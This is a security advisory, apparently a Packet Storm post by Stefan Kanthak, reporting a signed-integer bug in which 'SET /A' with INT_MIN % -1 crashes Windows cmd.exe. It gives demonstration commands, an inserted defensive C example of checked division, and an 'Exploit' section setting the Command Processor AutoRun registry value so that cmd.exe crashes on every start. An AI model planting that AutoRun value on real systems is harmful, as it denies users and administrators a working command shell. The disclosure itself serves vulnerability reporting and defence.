## https://sploitus.com/exploit?id=PACKETSTORM:167049
Hi @ll,  
  
the subject says it all: a 25 year old TRIVIAL signed integer  
arithmetic bug (which may well have earned a PhD now) crashes  
Windows' command interpreter CMD.exe via its builtin SET command.  
See their documentation:  
<https://technet.microsoft.com/en-us/library/cc771320.aspx>  
<https://technet.microsoft.com/en-us/library/cc754250.aspx>  
  
  
Classification  
~~~~~~~~~~~~~~  
  
<https://cwe.mitre.org/data/definitions/190.html>  
CWE-190: Integer Overflow or Wraparound  
  
<https://cwe.mitre.org/data/definitions/248.html>  
CWE-248: Uncaught Exception  
  
  
Demonstration  
~~~~~~~~~~~~~  
  
On Windows NT4 or any newer version start the command interpreter and  
run the following 4 command lines (the first 3 set just the base):  
  
SET /A -2147483648  
SET /A ~2147483647  
SET /A ~2147483647 / -1  
SET /A ~2147483647 % -1  
  
[1] Oops: although -2147483648 = -2**31 alias INT_MIN is a valid signed  
32-bit integer, the command interpreter reports this literal as  
"Invalid number. Numbers are limited to 32-bits of precision."  
  
[2] As expected, ~2147483647, the bitwise complement of INT_MAX, yields INT_MIN.  
  
[3] Also as expected, computing the quotient INT_MIN / -1 produces  
"Invalid number. Numbers are limited to 32-bits of precision.": the  
correct result is +2147483648 alias INT_MAX + 1, which does not fit  
into a signed 32-bit integer, i.e. the division overflows; on x86/x64  
processors (and their 8- and 16-bit predecessors too) this raises a  
#DE (divide error) exception.  
  
[4] OUCH: rather unexpectedly, computing the remainder INT_MIN % -1  
crashes the command processor with the #DE exception, i.e.  
the developers failed to apply to the remainder the check they  
implemented for the division.  
  
JFTR: the remainder of <any integer> % -1 as well as <any integer> % 1  
is (by the algebraic definition of division) 0 (in words: ZERO):  
the remainder is in magnitude less than the divisor, and the only  
integer that is in magnitude less than |-1| = 1 is 0!  
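As an added illustration that is not part of Kanthak's post, the C program below shows the arithmetic behind points [1] to [4] and the guard a SET /A style evaluator needs: a decimal literal parser that accepts -2147483648, and checked quotient and remainder routines that both catch the single overflowing operand pair, INT_MIN and -1, before the hardware divide instruction can raise #DE. How cmd.exe actually tokenizes the literal is not described on the page; the parser here is one assumed design that accumulates the value in the negative domain so that INT_MIN is representable. The function and enum names are the example's own.

```c
#include <limits.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Status codes for the checked 32-bit arithmetic below (example's own). */
enum arith_status { ARITH_OK = 0, ARITH_DIV_BY_ZERO, ARITH_OVERFLOW };

/* Parse an optionally signed decimal literal into int32_t without overflow.
 * Accumulating in the negative domain lets "-2147483648" (INT_MIN) be
 * accepted, which a "parse the magnitude, then negate" design cannot do,
 * because the magnitude 2147483648 does not fit in 32 bits (point [1]).
 * Returns false on overflow or malformed input. */
bool parse_int32(const char *s, int32_t *out) {
    bool neg = false;
    if (*s == '-') { neg = true; s++; } else if (*s == '+') { s++; }
    if (*s < '0' || *s > '9') return false;
    int32_t acc = 0;                          /* stays <= 0 while accumulating */
    for (; *s; s++) {
        if (*s < '0' || *s > '9') return false;
        int d = *s - '0';
        /* acc * 10 - d must stay >= INT32_MIN; truncating division toward
         * zero yields the ceiling for negative values, which is the bound. */
        if (acc < (INT32_MIN + d) / 10) return false;
        acc = acc * 10 - d;
    }
    if (!neg) {
        if (acc == INT32_MIN) return false;   /* +2147483648 does not fit */
        acc = -acc;
    }
    *out = acc;
    return true;
}

/* Checked quotient (point [3]): rejects division by zero and the one
 * overflowing case, INT_MIN / -1, whose true result +2147483648 exceeds
 * INT_MAX. On x86/x64 the IDIV instruction raises #DE for that case, so
 * the operands must be screened before the hardware sees them. */
enum arith_status checked_div(int32_t a, int32_t b, int32_t *out) {
    if (b == 0) return ARITH_DIV_BY_ZERO;
    if (a == INT32_MIN && b == -1) return ARITH_OVERFLOW;
    *out = a / b;
    return ARITH_OK;
}

/* Checked remainder (point [4]): needs exactly the same screening as the
 * quotient, because IDIV computes quotient and remainder together and
 * traps on INT_MIN, -1 for both. Mathematically the remainder of any
 * integer divided by -1 is 0, so that value is returned for the guarded
 * pair instead of letting the trap happen. */
enum arith_status checked_mod(int32_t a, int32_t b, int32_t *out) {
    if (b == 0) return ARITH_DIV_BY_ZERO;
    if (a == INT32_MIN && b == -1) { *out = 0; return ARITH_OK; }
    *out = a % b;
    return ARITH_OK;
}

/* Walk the four command lines from the demonstration. */
int main(void) {
    int32_t v = 0, r = 0;
    /* [1] the literal INT_MIN is a valid 32-bit value */
    printf("parse -2147483648 -> %s (%d)\n",
           parse_int32("-2147483648", &v) ? "ok" : "rejected", v);
    /* [2] the bitwise complement of INT_MAX is INT_MIN */
    printf("~2147483647 = %d\n", ~INT32_MAX);
    /* [3] quotient INT_MIN / -1 must be rejected as an overflow */
    printf("INT_MIN / -1 -> status %d\n", checked_div(INT32_MIN, -1, &r));
    /* [4] remainder INT_MIN % -1 is 0 and must not reach IDIV unguarded */
    enum arith_status s = checked_mod(INT32_MIN, -1, &r);
    printf("INT_MIN %% -1 -> status %d, remainder %d\n", s, r);
    return 0;
}
```

The point of keeping the guard in both routines is that a remainder operation on x86 is the same IDIV as the quotient: screening only the `/` path, as the advisory describes for cmd.exe, leaves the `%` path to trap.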
  
  
Exploit  
~~~~~~~  
  
Setting one or both of the following documented registry entries  
crashes the command interpreter upon invocation (unless started  
with the switch /D):  
  
[HKEY_CURRENT_USER\Software\Microsoft\Command Processor]  
"AutoRun"="SET /A ~2147483647 % ~0"  
  
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor]  
"AutoRun"="SET /A ~2147483647 % ~0"  
  
  
stay tuned  
Stefan Kanthak  
  
PS: I reported this bug as DoS to the MSRC; they replied with the  
following bullshit statement in their 2nd sentence:  
  
| Though engineering confirmed the crash in this case, it was assessed  
| as a Low severity DoS.  
| Their reasoning centers around the requirement to have admin  
| privileges to pull off the attack.  
  
OUCH! Unprivileged users can of course write this registry entry below  
[HKEY_CURRENT_USER\Software\Microsoft\Command Processor]